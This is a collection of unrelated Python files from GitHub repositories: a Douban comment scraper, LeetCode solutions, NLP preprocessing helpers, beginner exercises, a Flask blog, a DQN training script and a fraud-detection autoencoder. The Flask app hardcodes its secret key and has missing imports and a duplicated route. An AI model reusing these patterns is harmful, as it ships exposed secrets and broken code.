of the code\nimport requests,re,time\nfrom bs4 import BeautifulSoup\n\ncount=0 \ni=0 # page number\ns,count_s,count_del=0,0,0\nlst_stars=[]
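# Douban sometimes rejects bare requests; a (hypothetical) hardening of the request in the loop below would pass a browser-like header, e.g.:\n# headers = {'User-Agent': 'Mozilla/5.0'}\n# r = requests.get(url, headers=headers, timeout=10)  # url built as in the loop below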
\nwhile count<50:\n try:\n r=requests.get('https://book.douban.com/subject/30398273/comments/hot?p='+str(i+1))\n except Exception as err:\n print(err)\n break\n soup=BeautifulSoup(r.text,'lxml')\n comments=soup.find_all('span','short') # fetch the comment texts directly\n \n pattern=re.compile('<span class=\"user-stars allstar(\\\\d+) rating\"')\n p=re.findall(pattern,r.text)\n for item in comments:\n count+=1\n if(count>50):\n count_del+=1 # entries beyond the 50-record cap\n else:\n print(count,item.string)\n \n for star in p:\n lst_stars.append(int(star))\n \n time.sleep(5)\n i+=1 # advance the page number\n \nfor star in lst_stars[:len(lst_stars)-count_del]:\n s+=int(star)\nprint(\"average is:{:.2f}\".format(s//(len(lst_stars)-count_del)))","repo_name":"pxjw/Python_data_analysys","sub_path":"classtest/spider_tech.py","file_name":"spider_tech.py","file_ext":"py","file_size_in_byte":934,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} {"seq_id":"1437158530","text":"# O(N), O(1) stefan pochmann solution\nclass Solution:\n def removeDuplicates(self, nums: List[int]) -> int:\n ans = 0\n for n in nums:\n if ans < 2 or n != nums[ans-2]:\n nums[ans] = n\n ans += 1\n return ans\n \n","repo_name":"henryliuser/hliu-cp","sub_path":"leetcode/medium/remove_duplicates_ii.py","file_name":"remove_duplicates_ii.py","file_ext":"py","file_size_in_byte":280,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} {"seq_id":"28020029225","text":"import collections\nfrom colorama import Fore\nfrom colorama import Style\nimport random\nimport hashlib\nfrom nltk.tokenize import word_tokenize\nimport torch\nimport torch.nn as nn\nimport torch.nn.init as init\nimport os\n\n#\n# def segment_counts(input):\n# lines=len([line for line in input])\n# return lines\n\ndef truecase(str):\n return str[0].lower()+str[1:]\n\ndef uppercase2normal(sent):\n '''\n This function converts a sentence to lowercase if the whole sentence is in uppercase;\n otherwise, it converts only the leading character to lowercase (truecase).\n '''\n if sent.isupper():\n return sent.lower()\n else:\n return truecase(sent)\n\n\n\n# def diff_src_tgt_warn(src,tgt):\n# if segment_counts(src)!=segment_counts(tgt):\n# print(f\" {Fore.RED}WARNING: {src} and {tgt} have different segment counts.{Style.RESET_ALL}\")\n# else:\n# pass\n\n\ndef removeEmptyParallel(src,tgt):\n with open(src,'r', encoding='utf8') as s,\\\n open(tgt,'r',encoding='utf8') as t,\\\n open(f\"{src}.noEmpty.sl\",'w', encoding='utf8') as os,\\\n open(f\"{tgt}.noEmpty.tl\",'w', encoding='utf8') as ot:\n\n for line_s, line_t in zip(s,t):\n if line_s.strip() and line_t.strip():\n os.write(line_s)\n ot.write(line_t)\n\ndef hash_sent(sent):\n return hashlib.md5(sent.strip().encode('utf8')).hexdigest()\n\n\ndef removeDuplicateParallel(src,tgt):\n hash_set_src=set()\n hash_set_tgt=set()\n with open(src, 'r', encoding='utf8') as s, \\\n open(tgt, 'r', encoding='utf8') as t, \\\n open(f\"{src}.noDuplicate.sl\", 'w', encoding='utf8') as os, \\\n open(f\"{tgt}.noDuplicate.tl\", 'w', encoding='utf8') as ot:\n for line_s, line_t in zip(s,t):\n hash_s=hash_sent(line_s)\n hash_t=hash_sent(line_t)\n if hash_s not in hash_set_src and hash_t not in hash_set_tgt:\n os.write(line_s)\n ot.write(line_t)\n hash_set_src.add(hash_s)\n hash_set_tgt.add(hash_t)\n
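# removeDuplicateParallel treats two pairs as duplicates when either side's stripped md5 digest repeats; the helper is whitespace-insensitive, e.g.:\n# assert hash_sent('  hello  ') == hash_sent('hello')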
\n\ndef text2vocab(input, vocab_size):\n '''\n\n input: path of the preprocessed input file.\n vocab_size: define the size of the vocabulary.\n :return: a vocabulary list (special tokens first, then the top-ranked words).\n\n Convert input corpus to a top ranked n vocab list including <pad>, <sos>, <eos> and <unk>.\n For languages that need segmentation (e.g. Zh, Ja and De etc.), please preprocess the corpus before passing in.\n '''\n\n\n tmp = []\n final = [] # Add idx of <pad>, <sos>, <eos> and <unk>.\n with open(input,'r',encoding='utf8') as f:\n for line in f:\n line=uppercase2normal(line)\n line=word_tokenize(line)\n line=' '.join(line)\n for w in line.strip().split():\n tmp.append(w)\n w_count=collections.Counter(tmp).most_common()[:vocab_size]\n for t in w_count:\n final.append(t[0])\n final.insert(0, '<unk>')\n final.insert(0, '<eos>')\n final.insert(0, '<sos>')\n final.insert(0, '<pad>')\n return final
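# The reserved tokens sit at fixed indices at the head of the returned list; e.g. (corpus path hypothetical):\n# vocab = text2vocab('corpus.txt', 8000)\n# vocab[:4] == ['<pad>', '<sos>', '<eos>', '<unk>']  # True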
\n\n\ndef word2idx(vocab):\n '''\n Return a dictionary {word:idx}.\n '''\n with open(vocab,'r',encoding='utf8') as f:\n word2idx={line.strip(): idx for idx,line in enumerate(f)}\n return word2idx\n\n\ndef sent2idx(vocab,sent):\n dict=word2idx(vocab)\n s=[dict['<sos>']]\n for w in sent.strip().split():\n if w not in dict.keys():\n s.append(dict['<unk>'])\n else:\n s.append(dict[w])\n s.append(dict['<eos>'])\n return s\n\ndef splitTrainTuneTest(src,tgt,sum_size,tune_size,test_size):\n '''\n sum_size: original corpus size (before splitting).\n tune_size: tune set size.\n test_size: test set size.\n '''\n with open(src,'r',encoding='utf8') as s,\\\n open(tgt,'r', encoding='utf8') as t,\\\n open('train.src','w',encoding='utf8') as train_s,\\\n open('train.tgt','w',encoding='utf8') as train_t,\\\n open('tune.src','w',encoding='utf8') as tune_s,\\\n open('tune.tgt','w',encoding='utf8') as tune_t,\\\n open('test.src','w',encoding='utf8') as test_s,\\\n open('test.tgt','w',encoding='utf8') as test_t:\n rand = random.sample(range(sum_size), sum_size)\n # print(rand)\n rand_tune = [i for i in rand[:tune_size]]\n print(rand_tune)\n rand_test = [i for i in rand[tune_size:tune_size+test_size]]\n print(rand_test)\n for i, (line_s, line_t) in enumerate(zip(s,t)):\n if i in rand_tune:\n tune_s.write(line_s)\n tune_t.write(line_t)\n elif i in rand_test:\n test_s.write(line_s)\n test_t.write(line_t)\n else:\n train_s.write(line_s)\n train_t.write(line_t)\n\n\ndef weight_init(m):\n '''\n Usage:\n model = Model()\n model.apply(weight_init)\n Info: https://gist.github.com/jeasinema/ed9236ce743c8efaf30fa2ff732749f5\n '''\n if isinstance(m, nn.Conv1d):\n init.normal_(m.weight.data)\n if m.bias is not None:\n init.normal_(m.bias.data)\n elif isinstance(m, nn.Conv2d):\n init.xavier_normal_(m.weight.data)\n if m.bias is not None:\n init.normal_(m.bias.data)\n elif isinstance(m, nn.Conv3d):\n init.xavier_normal_(m.weight.data)\n if m.bias is not None:\n init.normal_(m.bias.data)\n elif isinstance(m, nn.ConvTranspose1d):\n init.normal_(m.weight.data)\n if m.bias is not None:\n init.normal_(m.bias.data)\n elif isinstance(m, nn.ConvTranspose2d):\n init.xavier_normal_(m.weight.data)\n if m.bias is not None:\n init.normal_(m.bias.data)\n elif isinstance(m, nn.ConvTranspose3d):\n init.xavier_normal_(m.weight.data)\n if m.bias is not None:\n init.normal_(m.bias.data)\n elif isinstance(m, nn.BatchNorm1d):\n init.normal_(m.weight.data, mean=1, std=0.02)\n init.constant_(m.bias.data, 0)\n elif isinstance(m, nn.BatchNorm2d):\n init.normal_(m.weight.data, mean=1, std=0.02)\n init.constant_(m.bias.data, 0)\n elif isinstance(m, nn.BatchNorm3d):\n init.normal_(m.weight.data, mean=1, std=0.02)\n init.constant_(m.bias.data, 0)\n elif isinstance(m, nn.Linear):\n init.xavier_normal_(m.weight.data)\n init.normal_(m.bias.data)\n elif isinstance(m, nn.LSTM):\n for param in m.parameters():\n if len(param.shape) >= 2:\n init.orthogonal_(param.data)\n else:\n init.normal_(param.data)\n elif isinstance(m, nn.LSTMCell):\n for param in m.parameters():\n if len(param.shape) >= 2:\n init.orthogonal_(param.data)\n else:\n init.normal_(param.data)\n elif isinstance(m, nn.GRU):\n for param in m.parameters():\n if len(param.shape) >= 2:\n init.orthogonal_(param.data)\n else:\n init.normal_(param.data)\n elif isinstance(m, nn.GRUCell):\n for param in m.parameters():\n if len(param.shape) >= 2:\n init.orthogonal_(param.data)\n else:\n init.normal_(param.data)\n\n\ndef 
init_weights(m):\n for name, param in m.named_parameters():\n nn.init.uniform_(param.data, -0.08, 0.08)\n\ndef count_parameters(model):\n return sum(p.numel() for p in model.parameters() if p.requires_grad)","repo_name":"hanjingyi/seq2seq_attention_pytorch","sub_path":"functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":7395,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"74391653354","text":"from pickle import APPEND\n\n\ndef countdown(num):\n list = []\n for i in range(num, -1, -1):\n list.append(i)\n return list\nprint(countdown(5)) \n\ndef print_return(x,y):\n print (x)\n return (y)\ni = print_return(3,5)\n\n\ndef first_plus_length(list):\n sum=(list [0])\n x= (sum + len(list))\n return x\nprint (first_plus_length([1,2,3,4,5]))\n\n\n\ndef greater_than_second(list):\n x=[]\n if len(list) <= 2:\n return'False'\n for i in range(0,len(list),1):\n if list[i] > list[1]:\n x.append (list[i]) \n print (len(x)) \n return x\n \n \nprint (greater_than_second([5,2,3,2,1,4]))\nprint (greater_than_second([5,2]))\n\n\ndef length_value(x,y):\n z=[]\n for i in range(0,x):\n z.append(y) \n \n return z\n \n\n\nprint (length_value(4,7))\nprint (length_value(6,2))","repo_name":"bchang0999/Python","sub_path":"class/lectures/function_basic_ii.py","file_name":"function_basic_ii.py","file_ext":"py","file_size_in_byte":829,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"25946797630","text":"from flask import Flask, render_template, redirect, url_for, flash\nfrom flask_bootstrap import Bootstrap\nfrom flask_ckeditor import CKEditor\nfrom datetime import date\nfrom werkzeug.security import generate_password_hash, check_password_hash\nfrom flask_sqlalchemy import SQLAlchemy\nfrom sqlalchemy.orm import relationship\nfrom flask_login import UserMixin, login_user, LoginManager, login_required, current_user, logout_user\nfrom forms import CreatePostForm\nfrom flask_gravatar import Gravatar\n\napp = Flask(__name__)\napp.config['SECRET_KEY'] = '8BYkEfBA6O6donzWlSihBXox7C0sKR6b'\nckeditor = CKEditor(app)\nBootstrap(app)\n\n##CONNECT TO DB\napp.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///blog.db'\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\ndb = SQLAlchemy(app)\n\nlogin_manager = LoginManager()\nlogin_manager.init_app(app)\n@login_manager.user_loader\ndef load_user(user_id):\n return User.get(user_id)\n\n##CONFIGURE TABLES\n\nclass User(db.Model):\n __tablename__ = \"users\"\n id = db.Column(db.Integer, primary_key = True)\n name = db.Column(db.String(250), nullable=False)\n email = db.Column(db.String(250), nullable=False)\n password = db.Column(db.String(250), nullable=False)\n posts = relationship(\"BlogPost\")\n\n\nclass BlogPost(db.Model):\n __tablename__ = \"blog_posts\"\n id = db.Column(db.Integer, primary_key=True)\n # Create Foreign Key, \"users.id\" the users refers to the tablename of User.\n author_id = db.Column(db.Integer, db.ForeignKey(\"users.id\"))\n # Create reference to the User object, the \"posts\" refers to the posts protperty in the User class.\n author = relationship(\"User\", back_populates=\"posts\")\n title = db.Column(db.String(250), unique=True, nullable=False)\n subtitle = db.Column(db.String(250), nullable=False)\n date = db.Column(db.String(250), nullable=False)\n body = db.Column(db.Text, nullable=False)\n img_url = db.Column(db.String(250), nullable=False)\ndb.create_all()\n\nclass RegisterForm(FlaskForm):\n email = 
StringField(\"Enter your email\"),\n password = StringField(\"Enter your password\")\n name = StringField(\"Name\", validators=[DataRequired()])\n submit = SubmitField(\"Sign Me Up!\")\n\n@app.route('/')\ndef get_all_posts():\n posts = BlogPost.query.all()\n return render_template(\"index.html\", all_posts=posts)\n\n\n@app.route('/register')\ndef register():\n return render_template(\"register.html\")\n\n\n@app.route('/login')\ndef login():\n return render_template(\"login.html\")\n\n\n@app.route('/logout')\ndef logout():\n return redirect(url_for('get_all_posts'))\n\n\n@app.route(\"/post/\")\ndef show_post(post_id):\n requested_post = BlogPost.query.get(post_id)\n return render_template(\"post.html\", post=requested_post)\n\n\n@app.route(\"/about\")\ndef about():\n return render_template(\"about.html\")\n\n\n@app.route(\"/contact\")\ndef contact():\n return render_template(\"contact.html\")\n\n\n@app.route(\"/new-post\")\ndef add_new_post():\n form = CreatePostForm()\n if form.validate_on_submit():\n new_post = BlogPost(\n title=form.title.data,\n subtitle=form.subtitle.data,\n body=form.body.data,\n img_url=form.img_url.data,\n author=current_user,\n date=date.today().strftime(\"%B %d, %Y\")\n )\n db.session.add(new_post)\n db.session.commit()\n return redirect(url_for(\"get_all_posts\"))\n return render_template(\"make-post.html\", form=form)\n\n\n@app.route(\"/edit-post/\")\ndef edit_post(post_id):\n post = BlogPost.query.get(post_id)\n edit_form = CreatePostForm(\n title=post.title,\n subtitle=post.subtitle,\n img_url=post.img_url,\n author=post.author,\n body=post.body\n )\n if edit_form.validate_on_submit():\n post.title = edit_form.title.data\n post.subtitle = edit_form.subtitle.data\n post.img_url = edit_form.img_url.data\n post.author = edit_form.author.data\n post.body = edit_form.body.data\n db.session.commit()\n return redirect(url_for(\"show_post\", post_id=post.id))\n\n return render_template(\"make-post.html\", form=edit_form)\n\n\n@app.route(\"/delete/\")\ndef delete_post(post_id):\n post_to_delete = BlogPost.query.get(post_id)\n db.session.delete(post_to_delete)\n db.session.commit()\n return redirect(url_for('get_all_posts'))\n\n\n# Register new users into the User database\n@app.route('/register', methods=[\"GET\", \"POST\"])\ndef register():\n form = RegisterForm()\n if form.validate_on_submit():\n hash_and_salted_password = generate_password_hash(\n form.password.data,\n method='pbkdf2:sha256',\n salt_length=8\n )\n new_user = User(\n email=form.email.data,\n name=form.name.data,\n password=hash_and_salted_password,\n )\n db.session.add(new_user)\n db.session.commit()\n\n return redirect(url_for(\"get_all_posts\"))\n\n return render_template(\"register.html\", form=form)\n\nif __name__ == \"__main__\":\n app.run()\n","repo_name":"TheDevNinja/Day-69","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5032,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"26335365436","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Feb 13 12:28:25 2018\n\n@author: Luis Gustavo Grubert Valensuela\n*******************************************************************************\nName: Luis Gustavo Grubert Valensuela Z#:23351882 lvalensuela2015@fau.edu\nCourse: Python Programming COP 4045-001 Spring 2018\nProfessor: Dr. 
Ionut Cardei\nDue Date:02/18/2018 Due Time: 11:30PM\nAssignment Homework 3\nLast Changed: 02/18/2018\nDescription:\nIn this assignment tree functions will be created:\n a) A function called input_tuple (in a new file p1.py) that reads from the\n terminal a sequence of objects with types provided by a tuple given as\n parameter and that returns the sequence of objects read as a tuple.\n b) a function called input_tuple_lc that is identical to input_tuple except \n that it uses list comprehension(s).\n c) a function read_tuple that works similarly to input_tuple, but instead \n of reading input from the terminal, it reads text from a file object passed \n as argument. \n*******************************************************************************\n\"\"\"\ndef treatTrueFalseStrings(booleanString):\n \"\"\" Function to parse true of false values from a string \"\"\"\n booleanInt = booleanString\n listFalseString = [\"False\",\"false\",\"0\",\"\",\" \",\"FALSE\"]\n if (booleanString in listFalseString):\n booleanInt = 0\n return booleanInt\n\ndef input_tuple(prompt, types, sep = \",\"):\n \"\"\" that reads from the\n terminal a sequence of objects with types provided by a tuple given as\n parameter and that returns the sequence of objects read as a tuple. \"\"\"\n inputString = str(input(prompt))\n listString = inputString.split(sep)\n try:\n if(len(listString) == len(types)):\n for i in range(len(listString)):\n listString[i] = types[i](treatTrueFalseStrings(listString[i]))\n \n myTuple = tuple(listString)\n else:\n #print(\"An error has occurred 1.\")\n myTuple = ()\n except:\n #print(\"An error has occurred 2.\")\n myTuple = ()\n return myTuple\n\ndef input_tuple_lc(prompt, types, sep = \",\"):\n \"\"\" a function called input_tuple_lc that is identical to input_tuple\n except that it uses list comprehension(s) \"\"\"\n try:\n inputString = str(input(prompt))\n listString = inputString.split(sep)\n lst = [types[i](treatTrueFalseStrings(listString[i])) for i in range(len(listString)) if (len(listString) == len(types)) ]\n myTuple = tuple(lst);\n except:\n #print(\"An error has occurred 3.\")\n myTuple=[]\n return myTuple;\n\ndef read_tuple(file_obj, types, sep):\n \"\"\"reads text from a file object passed \n as argument. \"\"\"\n try:\n \n line_str_list = []\n \n \n \"\"\"\n The commented code below was transformed in two comprehension lists.\n \n for line_str in file_obj:\n line_str_list.append(line_str.split(sep))\n \n for i in range(len(line_str_list)):\n print(line_str_list[i])\n for j in range(len(line_str_list[i])):\n print(line_str_list[i][j])\n line_str_list[i][j] = types[j](treatTrueFalseStrings(line_str_list[i][j].replace(\"\\n\", \"\")))\n \n \"\"\"\n \n [line_str_list.append(line_str.split(sep)) for line_str in file_obj]\n line_str_list2 = []\n line_str_list2 = [types[j](treatTrueFalseStrings(line_str_list[i][j].replace(\"\\n\", \"\")))\n for i in range(len(line_str_list))\n for j in range(len(line_str_list[i]))]\n \n # get only the first line read from the file.\n myTuple = tuple(line_str_list2[0:len(types)]);\n return(myTuple)\n \n except:\n print(\"An error has occurred 3.\")\n myTuple = ()\n return myTuple\n\ndef testif(b, testname, msgOK = \"\", msgFailed = \"\"):\n \"\"\" function created to test the program. 
Returns True if a tuple is\n returned as the return statement"""\n if b:  # truthiness of b itself, not of type(b), decides the outcome\n print(\"Success: \" + testname + \"; \"+ msgOK)\n else:\n print(\"Failed: \" + testname + \"; \"+ msgFailed)\n \n print(\"\\n\")\n return b\n\nprint(input_tuple(\"Enter first name, last name, age ( float), ID (int), fulltime (bool): \",\n(str, str, float, int, bool), # this is the tuple with expected types\n\",\"))\n\ntestif(isinstance(input_tuple(\"Enter first name, last name, age ( float), ID (int), fulltime (bool): \",\n(str, str, float, int, bool), # this is the tuple with expected types\n\",\"), tuple), \"input_tuple test\")\n\ntestif(isinstance(input_tuple_lc(\"Enter first name, last name, age ( float), ID (int), fulltime (bool): \",\n(str, str, float, int, bool), # this is the tuple with expected types\n\",\"),tuple), \"input_tuple_lc test\")\n\nf = open(\"cars.csv\", \"r\")\ntestif(isinstance(read_tuple(f, (str, str, float, int, bool), \",\"), tuple), \"read_tuple test\")\nf.close()\n","repo_name":"valen22br/pythonProjects","sub_path":"fau/H3/p1.py","file_name":"p1.py","file_ext":"py","file_size_in_byte":4949,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} {"seq_id":"74383090151","text":"'''\n Bryon Kucharski\n Wentworth Institute of Technology\n Summer 2018\n \n Applying a DQN to a 2D simulation of a 1D robot\n Similar to http://edersantana.github.io/articles/keras_rl/\n\n The environment is a stddraw environment with a topdown view (see simulated_1D_robot_topdown.py)\n \n It is used to learn the X direction of the robot\n it uses a matrix of 0s and 1s (taken from the stddraw environment) to calculate the state \n\n'''\n\nimport numpy as np\nimport os, sys, inspect\nimport time\nfrom random import randint\nimport matplotlib.pyplot as plt\nimport matplotlib.animation as animation\nfrom matplotlib import style\nimport tensorflow as tf\n\n\nstyle.use('fivethirtyeight')\n\n\n \n\n#this is just to import rl agent from a different folder\nrl_subfolder = os.path.realpath(os.path.abspath(os.path.join(os.path.split(inspect.getfile( inspect.currentframe() ))[0],\"../rl\")))\nif rl_subfolder not in sys.path:\n sys.path.insert(0, rl_subfolder)\n\nfrom DQNAgent import DQNAgent\n\nrobot_subfolder = os.path.realpath(os.path.abspath(os.path.join(os.path.split(inspect.getfile( inspect.currentframe() ))[0],\"../robot\")))\nif robot_subfolder not in sys.path:\n sys.path.insert(0, robot_subfolder)\n\nfrom simulated_1D_robot import simulated_1D_robot\n\n\nconfig = tf.ConfigProto()\nconfig.gpu_options.allow_growth = True\nsess = tf.Session(config=config)\nfrom keras import backend as K\nK.set_session(sess)\n\n\nnum_grid_x = 5\nnum_grid_y = 100\n\nsave_model = True\nload_model = False\nupdate_model = True\nmodel_name = 'RewardFunction2_2000.h5'\ndraw_scene = True\n\nif (load_model):\n esp = 0.01\nelse:\n esp = 1\n\nrobot = simulated_1D_robot(\n goalie_pos_start = 3, \n GRID_NUM_HEIGHT = num_grid_y, \n GRID_NUM_WIDTH = num_grid_x, \n GRID_SIZE = 10,\n draw_scene = draw_scene,\n gridworld = True\n )\n\nagent = DQNAgent(#state_size =num_grid_y*num_grid_x,\n state_size =2, \n action_size = 3,\n gamma = 0.95,\n epsilon = esp,\n epsilon_min = 0.01,\n epsilon_decay = 0.995,\n learning_rate = 0.001, \n model_type = 'DeepModel'\n )\n\nEPOCHS = 5000\nif not draw_scene:\n UPDATE_FREQ = 1000000\nelse:\n UPDATE_FREQ = 1000000\n\nbatch_size = 32\n\nstart = time.time()\ndone = False\nreward_count = 0\ntotal_reward = 0\ntotal_rewards = []\nnum_epochs = []\ntotal_loss = []\n\naxes = 
plt.gca()\n#axes.set_xlim(0, 100)\n#axes.set_ylim(-50, +50)\nline, = axes.plot(num_epochs, total_rewards, 'r-')\n\nif load_model: \n agent.load(model_name)\n\n\n\nfor r in range(EPOCHS):\n #state = robot.get_state_matrix()\n state = robot.get_state_array()\n state = np.array([state])\n #print(state)\n robot.reset()\n \n i = 0\n\n while not done:\n end = time.time()\n elapsed = end - start\n \n if elapsed > 1/UPDATE_FREQ:\n \n if draw_scene:\n robot.drawGridScene()\n\n start = time.time()\n action = agent.take_action(state)\n state_prime, reward, done = robot.step(action, stateType = 'array')\n state_prime = np.array([state_prime])\n\n total_reward += reward\n \n if update_model:\n agent.remember(state, action, reward, state_prime, done)\n\n #print(\"\\nState: \\n\" + str(state.reshape(num_grid_y,num_grid_x)) + \" \\naction: \" + str(action) + \" Reward: \" + str(reward) + \"\\nState Prime: \\n\" + str(state_prime.reshape(num_grid_y,num_grid_x)))\n state = state_prime\n if done:\n \n done = False\n \n #check for a catch\n if reward == 1:\n reward_count += 1\n print(\"CATCH!!!\")\n\n #exit this epoch \n break\n i = i + 1\n \n if(agent.memory_length() > batch_size) and (update_model):\n #start = time.time()\n history = agent.replay(batch_size)\n print(\"epoch: \" + str(r) + \" history: \" + str(history.history['loss']) + \" reward_count: \" + str(reward_count))\n #end = time.time()\n #print(end - start)\n total_loss.append(history.history['loss'])\n \n\n if r % 10 == 0:\n total_rewards.append(total_reward)\n num_epochs.append(r)\n \n\n\nif save_model:\n agent.save(model_name)\n\n\nplt.figure(1)\nplt.plot(num_epochs,total_rewards)\nplt.title(\"Cumulative Reward in Deep Learning 2D Simulation: Vector State\")\nplt.ylabel(\"Cumulative Reward\")\nplt.xlabel(\"Number of Updates\")\nplt.show()\n\n\n","repo_name":"bryonkucharski/robot-catcher","sub_path":"python_scripts/goalie_2D/dqn/dqn_2D_simulation_1D_robot_x.py","file_name":"dqn_2D_simulation_1D_robot_x.py","file_ext":"py","file_size_in_byte":4644,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"74118676713","text":"class Solution:\n def maxProduct(self, nums):\n if not nums:\n return 0\n\n cur_max = cur_min = res = nums[0]\n\n for n in nums[1:]:\n cur_max, cur_min = max(n, cur_max * n, cur_min * n), min(n, cur_max * n, cur_min * n)\n res = max(res, cur_max)\n\n return res\n","repo_name":"cabulous/leetcode","sub_path":"python/152.py","file_name":"152.py","file_ext":"py","file_size_in_byte":315,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"35288922838","text":"import os\n\nos.environ['KMP_DUPLICATE_LIB_OK']='True'\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport pandas as pd\nimport numpy as np\nfrom pylab import rcParams\nimport tensorflow as tf\nfrom keras.models import Model, load_model\nfrom keras.layers import Input, Dense\nfrom keras.callbacks import ModelCheckpoint, TensorBoard\nfrom keras import regularizers\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import confusion_matrix, precision_recall_curve\nfrom sklearn.metrics import recall_score, classification_report, auc, roc_curve\nfrom sklearn.metrics import precision_recall_fscore_support, f1_score\nfrom numpy.random import seed\n \nseed(1)\nfrom tensorflow import set_random_seed\n\nset_random_seed(2)\nSEED = 123 # used to help randomly select the data 
points\nDATA_SPLIT_PCT = 0.2\nrcParams['figure.figsize'] = 8, 6\nLABELS = [\"Normal\", \"Fraud\"]\n\ndf = pd.read_csv(\"creditcard.csv\")\n\n# print(df.shape[0])\n\nsign = lambda x: (1, -1)[x < 0]\n\ndf_train, df_test = train_test_split(df, test_size=DATA_SPLIT_PCT, random_state=SEED)\ndf_train, df_valid = train_test_split(df_train, test_size=DATA_SPLIT_PCT, random_state=SEED)\n\n# print(df_train.shape[0], df_valid.shape[0], df_test.shape[0])\n\ndf_train_0 = df_train.loc[df['Class'] == 0]\ndf_train_1 = df_train.loc[df['Class'] == 1]\ndf_train_0_x = df_train_0.drop(['Class'], axis=1)\ndf_train_1_x = df_train_1.drop(['Class'], axis=1)\n# print(df_train_0_x.shape[0], df_train_0_x.shape[0])\n\ndf_valid_0 = df_valid.loc[df['Class'] == 0]\ndf_valid_1 = df_valid.loc[df['Class'] == 1]\ndf_valid_0_x = df_valid_0.drop(['Class'], axis=1)\ndf_valid_1_x = df_valid_1.drop(['Class'], axis=1)\n# print(df_valid_0_x.shape[0], df_valid_0_x.shape[0])\n\ndf_test_0 = df_test.loc[df['Class'] == 0]\ndf_test_1 = df_test.loc[df['Class'] == 1]\ndf_test_0_x = df_test_0.drop(['Class'], axis=1)\ndf_test_1_x = df_test_1.drop(['Class'], axis=1)\n# print(df_test_0_x.shape[0], df_test_0_x.shape[0])\n\nscaler = StandardScaler().fit(df_train_0_x)\ndf_train_0_x_rescaled = scaler.transform(df_train_0_x)\ndf_valid_0_x_rescaled = scaler.transform(df_valid_0_x)\ndf_valid_x_rescaled = scaler.transform(df_valid.drop(['Class'], axis=1))\ndf_test_0_x_rescaled = scaler.transform(df_test_0_x)\ndf_test_x_rescaled = scaler.transform(df_test.drop(['Class'], axis=1))\n\nnb_epoch = 100\nbatch_size = 128\ninput_dim = df_train_0_x_rescaled.shape[1] # num of predictor variables,\nencoding_dim = 32\nhidden_dim = int(encoding_dim / 2)\nlearning_rate = 10e-8\ninput_layer = Input(shape=(input_dim,))\nencoder = Dense(encoding_dim, activation='relu', activity_regularizer=regularizers.l1(learning_rate))(input_layer)\nencoder = Dense(hidden_dim, activation='relu')(encoder)\ndecoder = Dense(hidden_dim, activation='relu')(encoder)\ndecoder = Dense(input_dim, activation='relu')(decoder)\n\nautoencoder = load_model('autoencoder_classifier.h5')\n\n# autoencoder = Model(inputs=input_layer, outputs=decoder)\n#\n# autoencoder.compile(metrics=['accuracy'],\n# loss='mean_squared_error',\n# optimizer='adam')\n# cp = ModelCheckpoint(filepath=\"autoencoder_classifier.h5\",\n# save_best_only=True,\n# verbose=0)\n# tb = TensorBoard(log_dir='./logs',\n# histogram_freq=0,\n# write_graph=True,\n# write_images=True)\n#\n#\n# history = autoencoder.fit(df_train_0_x_rescaled, df_train_0_x_rescaled,\n# epochs=nb_epoch,\n# batch_size=batch_size,\n# shuffle=True,\n# validation_data=(df_valid_0_x_rescaled, df_valid_0_x_rescaled),\n# verbose=1,\n# callbacks=[cp, tb]).history\n\nvalid_x_predictions = autoencoder.predict(df_valid_x_rescaled)\nmse = np.mean(np.power(df_valid_x_rescaled - valid_x_predictions, 2), axis=1)\nerror_df = pd.DataFrame({'Reconstruction_error': mse, 'True_class': df_valid['Class']})\nprecision_rt, recall_rt, threshold_rt = precision_recall_curve(error_df.True_class, error_df.Reconstruction_error)\nplt.plot(threshold_rt, precision_rt[1:], label=\"Precision\", linewidth=5)\nplt.plot(threshold_rt, recall_rt[1:], label=\"Recall\", linewidth=5)\nplt.title('Precision and recall for different threshold values')\nplt.xlabel('Threshold')\nplt.ylabel('Precision/Recall')\nplt.legend()\nplt.show()\n\nf1_array = []\nmax_f1_array = 0\nprecision_recall_pos = 0\nfor i in range(len(recall_rt)):\n num = 2 * recall_rt[i] * precision_rt[i]\n den = recall_rt[i] + 
precision_rt[i]\n temp_f1_array = float (num/den)\n f1_array.append(temp_f1_array)\n if temp_f1_array > max_f1_array:\n max_f1_array = temp_f1_array\n precision_recall_pos = i\nprint(max_f1_array, precision_recall_pos)\nprint(precision_rt[precision_recall_pos])\nprint(recall_rt[precision_recall_pos])\n\ntest_x_predictions = autoencoder.predict(df_test_x_rescaled)\nmse = np.mean(np.power(df_test_x_rescaled - test_x_predictions, 2), axis=1)\nprint(\"mse: \", mse)\nerror_df_test = pd.DataFrame({'Reconstruction_error': mse, 'True_class': df_test['Class']})\nerror_df_test = error_df_test.reset_index()\nthreshold_fixed = 0.22\ngroups = error_df_test.groupby('True_class')\nfig, ax = plt.subplots()\nfor name, group in groups:\n ax.plot(group.index, group.Reconstruction_error, marker='o', ms=3.5, linestyle='',\n label=\"Fraud\" if name == 1 else \"Normal\")\nax.hlines(threshold_fixed, ax.get_xlim()[0], ax.get_xlim()[1], colors=\"r\", zorder=100, label='Threshold')\nax.legend()\nplt.title(\"Reconstruction error for different classes\")\nplt.ylabel(\"Reconstruction error\")\nplt.xlabel(\"Data point index\")\nplt.show()\n\npred_y = [1 if e > threshold_fixed else 0 for e in error_df_test.Reconstruction_error.values]\nconf_matrix = 